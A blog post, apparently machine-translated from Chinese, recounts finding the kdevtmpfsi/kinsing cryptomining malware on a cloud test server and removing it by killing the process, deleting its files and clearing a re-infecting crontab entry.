Recently in several test server running on some business data, but after a few days the server suddenly became extremely slow, type a command like jam, sometimes even couldn’t connect, at first I thought it was network problem, is to kill off process, to run the process, finally can’t bear, said ali cloud background on the restart the server, As a result, the CPU usage has reached 100%.
Then I killed the process and restarted the server. After the server was started, the CPU was normal. I thought it was caused by my running data. When I deployed the test package a few days later, it was surprisingly slow again, and the CPU usage was 99.9%. It turned out THAT I was too young.
The Linux command (top) is used to check out what is taking up so much CPU resources.
The first thing you see is, what is this? Who deployed this? Asked the next usual side of the back pot man, it seems that he did not get it, it seems that this pot is not thrown, that can only…
What? Got a virus?
Based on past experience, shouldn’t this be something that happens when you click on a little sister on a web page? That’s why I’m poisoned.
What is this thing
Now that it’s poisoned, let’s see what it is.
Dig the virus, you should be more or less in the same site all heard dig, dig a coin, if don’t have to write articles in helpless pain, on the other hand, to dig the currency need to strong computing resources, then also need many servers to support, there’s some pussies don’t want to put too much, only by some evil means, the script into our server, For example, we need to install a Redis, so like my English is not very good, may be the first time not to go to the official website, but to find Baidu, if you happen to find resources inside the people implanted this thing, so unfortunately, your server may have to help others to do something.
What to do with the virus
Since this virus, causing our server is very card, so it must be killed, may not have much contact with Linux students, have considered reinstalling the mirror.
You don’t have to.
First we find the process and kill it.
Next, delete the kdevtmpfsi file, usually in the TMP directory
There’s a kinsing file that we’re going to kill and delete as well
Note here that I tried several servers where kinsing files might be located, but we can see the file path in the above way, just find it and delete it.
At this time, we check the CPU usage by using top, and we can find that the CPU usage is normal
Just when I thought everything was going to be all right, reality hit me hard. Within minutes, THE CPU usage was 99.96% again and I was going to crash.
After in-depth communication with Baidu, I finally knew the problem.
Check the scheduled task of the server, crontab -l, you will see the following task, if there is no one, you can check this IP, usually is a foreign IP.
We just delete the scheduled tasks, and the link is to download them after we kill the process and delete the file, and then run them again through the script.
That’s why I killed the virus, and it reappeared a short time later.
Here we have completely dealt with the virus, if you are using Ali Cloud ECS, when this thing, in fact, will be SMS notification you, but at that time too young did not care about how, in addition to the server port default is 22, he had better change a port, or it is easy to be attacked by the wicked.
Now the server is so cool, it doesn’t get stuck anymore.
More exciting content please pay attention to wechat public number: the growth of a programmer